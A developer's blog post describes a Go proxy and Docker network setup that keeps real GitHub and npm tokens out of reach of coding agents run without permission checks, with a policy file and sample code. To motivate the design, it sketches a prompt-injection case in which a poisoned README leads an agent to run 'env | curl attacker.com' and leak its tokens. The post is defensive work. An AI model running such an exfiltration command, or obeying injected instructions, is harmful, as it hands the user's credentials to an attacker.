
My coding agents run with zero secrets (and they don't even know)


I run Claude Code and Codex in yolo mode. --dangerously-skip-permissions, the whole thing. Which is great until you remember prompt injection is real and one cursed README could make the agent go env | curl attacker.com and yeet my GitHub token into the void.

So I fixed it. No paid sandbox product, no platform. One small Go proxy and one idea stolen from the big kids: the agent never holds a real credential. Ever.

The result is yagop/sandbox.

The trick

The agent lives on an internal Docker network. It literally cannot reach the internet. Its only way out is the proxy, which holds my actual GH_TOKEN and NPM_TOKEN and stamps the right Authorization header onto each request as it leaves.

Inside the container? GH_TOKEN=dummy. An npm token that says dummy. Git remotes rewritten from SSH to HTTPS so there is not even a key file to steal. The agent thinks it is authenticated (it is!) but if it gets prompt-injected and tries to exfiltrate its secrets, there is nothing to grab. You cannot leak what you never had. Iconic behavior honestly.

The whole policy is a lil JSON file

{
  "rules": [
    { "host": "api.github.com", "header": "Authorization", "value": "Bearer ${GH_TOKEN}" },
    { "host": "github.com", "header": "Authorization", "value": "Basic ${GH_BASIC}" },
    { "host": "registry.npmjs.org", "header": "Authorization", "value": "Bearer ${NPM_TOKEN}" }
  ]
}

Secrets are resolved by name from the environment when the proxy starts, so proxy up grabs a fresh gh auth token and proxy reload rotates them without restarting anything. They never appear in the config, the command line, or the sandbox.
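Here is the core of that pattern in Go, as an added example and not yagop/sandbox's own code: load the policy file above, resolve every ${NAME} from the environment once at start-up (failing loudly on an unset name), then swap the sandbox's dummy header for the real one on exact host matches. It assumes the proxy sees the plaintext request, and the lookup function stands in for os.LookupEnv so the sample runs offline.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"regexp"
)

// Rule mirrors one entry of the post's policy file: which host gets which header.
type Rule struct {
	Host, Header, Value string
}
type Policy struct{ Rules []Rule }

var placeholder = regexp.MustCompile(`\$\{([A-Za-z0-9_]+)\}`)

// LoadPolicy parses the JSON and resolves every ${NAME} through lookup (os.LookupEnv
// in real use) at start-up. An unset name is an error, never a blank credential.
func LoadPolicy(raw []byte, lookup func(string) (string, bool)) (*Policy, error) {
	var p Policy
	if err := json.Unmarshal(raw, &p); err != nil {
		return nil, err
	}
	for i, r := range p.Rules {
		var missing error
		p.Rules[i].Value = placeholder.ReplaceAllStringFunc(r.Value, func(m string) string {
			name := placeholder.FindStringSubmatch(m)[1]
			v, ok := lookup(name)
			if !ok {
				missing = fmt.Errorf("rule for %s: %s is not set", r.Host, name)
			}
			return v
		})
		if missing != nil {
			return nil, missing
		}
	}
	return &p, nil
}

// Stamp replaces the sandbox's dummy header with the real one on the first rule whose
// host matches exactly (no suffix matching). It reports whether any rule applied.
func (p *Policy) Stamp(req *http.Request) bool {
	for _, r := range p.Rules {
		if req.URL.Hostname() == r.Host {
			req.Header.Set(r.Header, r.Value)
			return true
		}
	}
	return false
}
```

Requests for hosts with no rule leave the proxy unchanged, still carrying only the dummy value, which is exactly what an exfiltration attempt would see.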

Do you need a product for this?

Slicer, Docker Sandboxes, and Infisical's agent-vault all ship this exact pattern, and they are genuinely good, especially agent-vault if you need per-agent scoping or a team setup. But for one dev on one laptop? It is a few hundred lines of Go and a JSON file.

Tokens stay home. Agents stay feral. Everybody wins.